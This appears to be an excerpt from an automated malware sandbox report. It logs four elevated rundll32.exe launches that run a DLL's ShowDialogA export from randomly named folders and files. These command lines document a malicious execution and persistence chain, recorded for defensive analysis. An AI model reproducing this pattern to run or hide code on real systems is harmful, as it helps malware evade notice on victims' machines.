Start time: 19:15:50
Start date: 12/01/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Imagebase: 0x6e0000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 19:15:51
Start date: 12/01/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Imagebase: 0x6e0000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 19:15:52
Start date: 12/01/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Imagebase: 0x6e0000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 19:15:54
Start date: 12/01/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Imagebase: 0x6e0000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
